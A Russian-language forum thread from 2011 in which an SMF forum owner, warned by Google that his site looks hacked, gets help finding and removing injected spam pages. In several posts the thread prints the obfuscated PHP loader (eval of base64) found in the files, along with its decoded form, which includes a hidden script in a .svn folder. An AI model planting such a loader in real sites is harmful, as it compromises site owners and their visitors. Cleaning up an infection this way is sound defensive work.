Возможно, данный сайт был взломан.

Автор chilly86, 20 апреля 2011, 21:16:52

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

chilly86

Сегодня заметил, что гугл в результатах поиска рядом с ссылкой на мой форум добавил примечание: Возможно, данный сайт был взломан.

вот письмо в котором он объясняет причину:

ЦитироватьDear owner or webmaster of http://www.melik.com.ua/,

We are writing to let you know that some pages from http://www.melik.com.ua/ will be labeled as potentially compromised in our search results. This is because some of your pages contain content which may harm the quality and relevance of our search results. It appears that these pages were created or modified by a third party, who may have hacked all or part of your site. Many times, they will upload files or modify existing ones, which then show up as spam in our index.

The following are some example URLs which exhibit this behavior:

    http://melik.com.ua/ixa-foku.htm

These URLs are using practices which do not follow our quality guidelines, which can be found here: http://www.google.com/support/webmasters/bin/answer.py?answer=35769&hl=en.

We encourage you to investigate this matter in order to protect your visitors. If your site was compromised, it's important to not only remove the malicious content from your pages, but also to identify and fix the vulnerability. Note that in many cases, this malicious content is hidden through a process known as cloaking. To learn what cloaking is, see http://www.google.com/support/webmasters/bin/answer.py?answer=66355&hl=en. You can confirm if your site is cloaking by using the Fetch as Googlebot tool: http://www.google.com/support/webmasters/bin/answer.py?answer=158587&hl=en. A good first step towards resolving the problem is to contact your web host's technical support for assistance. It's also important to make sure that your website's software is up-to-date with the latest security updates and patches.

More information about how to fix your site can be found at:

http://www.google.com/support/webmasters/bin/answer.py?answer=163634&hl=en

Once you've made sure your site is clean and secure, you can request reconsideration by going to https://www.google.com/webmasters/tools/reconsideration?hl=en.

я так понимаю, что ругается он именно на эту страничку, которую злоумышленник добавил

The following are some example URLs which exhibit this behavior:

http://melik.com.ua/ixa-foku.htm

при переходе по этой ссылке, открывается мой форум, но заголовок у него другой: Online printable baseball lineup cards

то, что нужно сменить пароли на фтп и я уже понял

подскажите, плиз, в какую сторону копать, чтобы удалить нехорошую ссылку??


добавлено:

вложил результат просмотра сайта Googlebot
to live is to die

Yworld_garry

1) Чистим комп
2) Меняем пароли все
3) Смотрим логи, возможно там можно увидеть что то.
5) ищем файлы на которые долбились. Либо просто подозрительные и не ваши файлы.
6) перезаливаем из архива или чистый если нет возможности удалить руками.
Скорее всего все сидит в индексных файлах, но вариантов хватает.

chilly86

Цитата: Yworld_garry от 20 апреля 2011, 22:16:22
3) Смотрим логи, возможно там можно увидеть что то.
логи в админке? там пусто
Цитата: Yworld_garry от 20 апреля 2011, 22:16:22
5) ищем файлы на которые долбились. Либо просто подозрительные и не ваши файлы.
как бы еще узнать на которые :(

Цитата: Yworld_garry от 20 апреля 2011, 22:16:22
6) перезаливаем из архива или чистый если нет возможности удалить руками.
есть бэкапы за последние 10 дней
проблема в том, что я не знаю когда такое началось :(
to live is to die

Yworld_garry

посмотрите в индексных файлах на подозрительные строчки, вверху и внизу страниц(как вариант)

chilly86

Цитата: Yworld_garry от 20 апреля 2011, 22:51:13
посмотрите в индексных файлах на подозрительные строчки, вверху и внизу страниц(как вариант)

спасибо, попробую
to live is to die

chilly86

итак была создана новая страница http://melik.com.ua/ixa-foku.htm
копия главной но с новой категорией:



все ссылки в новом разделе имеют вид:

http://melik.com.ua/ixa-q2zr8.htm
http://melik.com.ua/ixa-c5ohpy.htm
и т.д. и ведут опять же таки на копию главной, но в новой категории каждый раз новый контент (бейсбол. учёба, путешествия)

в индексовых файлах вроде бы ничего страшного не нашел, правда искатель из меня еще тот :(

сообщение от гугла датировано 12 числом, а мой последний бекап именно за эту дату, т.е. замена из бекапа ничего не даст
to live is to die

GeorG

Возможно бэкап сделан несколько времени ранее (может час), чем был изменён код.
Верстка тем по шаблону, их доработка/переработка, переделка тем с версии smf 1.1 на smf 2.0. Примеры работ - insidestyle.ru
Установка модов (заточка под ваш форум); Моды под заказ; Обновление форума; Правильный перенос; Удаление/лечение вирусов; Устранения ошибок.
Обращаться в ЛС
Мой форум
Модуль анти-спама CleanTalk, сам пользуюсь
Сервера которыми сам пользуюсь - cadedic.ru

Yworld_garry

Сравните файлы из чистого дистрибутива с вашими на ftp. И не знакомые удалите.

chilly86

Цитата: Yworld_garry от 21 апреля 2011, 10:38:40
Сравните файлы из чистого дистрибутива с вашими на ftp. И не знакомые удалите.

сравнил папки Sources и Themes\default
идентичны, за исключением php файлов модов симплпортала и кармы

искал вендовым поиском по запросу ixa-foku.htm
такие строки встречаются только в файле usage_201104

но это файл статистики...

даже не знаю что делать
спрошу у бывшего админа, который более компетентен в этом
если он не поможет - буду сначала удалять моды, и переустанавливать форум  :'(
to live is to die

chilly86

в некоторых в начале присутствовал код

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2Jhc3RpbmRhL2RvbWFpbnMvbWVsaWsuY29tLnVhL3B1YmxpY19odG1sL2dhbGxlcnkvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

почистил все файлики, но результата пока нет :(
to live is to die

Yworld_garry

Ловите раскодированную строчку, там указано что искать
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/bastinda/domains/melik.com.ua/public_html/gallery/.svn/tmp/prop-base/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

chilly86

Цитата: Yworld_garry от 21 апреля 2011, 13:03:33
Ловите раскодированную строчку, там указано что искать
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/bastinda/domains/melik.com.ua/public_html/gallery/.svn/tmp/prop-base/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

спасибо огромнейшее, да я нашел в этом файле вредоносный код

удалил и оставил строки:

<?php 

?>


верно?

и с остальных файлов удалил
на данный момент заливаю исправленные файлы на фтп

пс: прикрепил еще не исправленный style.css.php
to live is to die

Yworld_garry

а разве должна быть такая папка вообще .svn?
я просто на работе и не помню что в галереи и тд. Может следует все удалить, тем более этот файл.

chilly86

Цитата: Yworld_garry от 21 апреля 2011, 13:43:28
а разве должна быть такая папка вообще .svn?
я просто на работе и не помню.

в этой папке /home/bastinda/domains/melik.com.ua/public_html/gallery/.svn/tmp/prop-base/
и лежали весь вредный контент и сам скрипт
все поудалял

спасибо Вам огромное, Yworld_garry  за помощь и отзывчивость O0
теперь по этому адрему http://melik.com.ua/ixa-foku.htm как и должно быть - 404

еще раз спасибо!
to live is to die

Yworld_garry

Все ок и это главное.
Не храните пароли от фтп и акков на компе и во всяких клиентах. Увести их не так сложно.
Пару паролей не сложно запомнить.

chilly86

Цитата: Yworld_garry от 21 апреля 2011, 13:54:53
Все ок и это главное.
Не храните пароли от фтп и акков на компе и во всяких клиентах. Увести их не так сложно.
Пару паролей не сложно запомнить.

Уже заучиваю :)
to live is to die